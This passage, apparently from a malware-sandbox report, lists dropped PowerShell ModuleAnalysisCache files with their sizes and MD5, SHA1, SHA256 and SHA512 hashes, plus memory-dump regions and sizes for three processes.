3e079c383239cc05d9e8fcd96a985811aa8e99ad315398fa3d17cbe60b404f2a041d99f7c6f9e22a545e0903092ff156762b38348d80686f0f61ec1a0eb6dbc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
274690dc14e1d87d0ba10d7b22db4555

SHA1
5b906c23079410477028f0af920a06174a195988

SHA256
9ea91138f6aebd8f3e4f4e988e1de6f0d72185a7b8c0bfa154373055728d7055

SHA512
0ea07ab38cb1a770e6f7e5bb51f6970c16e6eb067a93d3baa8134e34a61aff92e046a2680cc84c02d7bf71216a1cd1154a3a538b1328c54bd2bda349adc1371e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
6c53a41742d312318e043777509ced39

SHA1
53f893b934102cd4c0325fb7966e73cb71ca83c3

SHA256
c806b0978a917e1ecb518cd19f7527700d2ccf5537348a0168272f95ccf4c73c

SHA512
33985340a341827df099ac07a16e1504d01ddb41d4c19e813d623668702c20bfac529047b36fe55f065defddcf67b1693693ab2f7a8fd06d90ead33ea92c2ecb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
f68f553358411759511bc795e348e71a

SHA1
6670662b255ce6cf0a9241ce5daef117081f03ab

SHA256
5cce648960da9760bd2c7e6231e8d021385dd0e203e356606bedb64d4e936de3

SHA512
2269e5efa4a97ef6705020c6dbcdeb551ed10108638633bdf03cc12ef4e28c8a29d3628cbf2367a884b20a443e1eb2d78748c42bcef8ae26441a41cc0094a291

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
ee0e65bedf05f3a570f3e7fa051a5b2a

SHA1
ae21a349a6dbccde583b8d04036b93bc79708e4d

SHA256
df533df636e0ad3837b7452e0809327344cf14492d1af2dfbbf0c253e056bb82

SHA512
820822583dab3457f0810adb95dd47b30aeafce362eac4ad756e1d8c457ca6ea524d0aa7cb5a95fb3b0bb39d77148f8dd7b561ce6ab5bde9b89a6c0e1d84dd67

Download Submit
memory/2304-136-0x000001C7F2330000-0x000001C7F253A000-memory.dmp

Filesize
2.0MB

Download
memory/2304-150-0x00007FF99C930000-0x00007FF99D3F1000-memory.dmp

Filesize
10.8MB

Download
memory/2304-135-0x000001C7F1FA0000-0x000001C7F2116000-memory.dmp

Filesize
1.5MB

Download
memory/2304-134-0x00007FF99C930000-0x00007FF99D3F1000-memory.dmp

Filesize
10.8MB

Download
memory/2304-133-0x000001C7D8270000-0x000001C7D8292000-memory.dmp

Filesize
136KB

Download
memory/4384-140-0x0000000005810000-0x0000000005832000-memory.dmp

Filesize
136KB

Download
memory/4384-142-0x0000000005FD0000-0x0000000006036000-memory.dmp

Filesize
408KB

Download
memory/4384-138-0x0000000005130000-0x0000000005166000-memory.dmp

Filesize
216KB

Download
memory/4384-139-0x00000000058C0000-0x0000000005EE8000-memory.dmp

Filesize
6.2MB

Download
memory/4384-146-0x0000000006D40000-0x0000000006D5A000-memory.dmp

Filesize
104KB

Download
memory/4384-145-0x00000000075D0000-0x0000000007C4A000-memory.dmp

Filesize
6.5MB

Download
memory/4384-141-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download
memory/4384-143-0x0000000006700000-0x000000000671E000-memory.dmp

Filesize
120KB

Download
memory/4840-147-0x00000000078F0000-0x0000000007986000-memory.dmp

Filesize
600KB

Download
memory/4840-151-0x00000000085F0000-0x000000000E347000-memory.dmp

Filesize
93.3MB

Download
memory/4840-148-0x0000000007600000-0x0000000007622000-memory.dmp

Filesize
136KB

Download
memory/4840-149-0x000000000E350000-0x000000000E8F4000-memory.dmp

Filesize
5.6MB

Download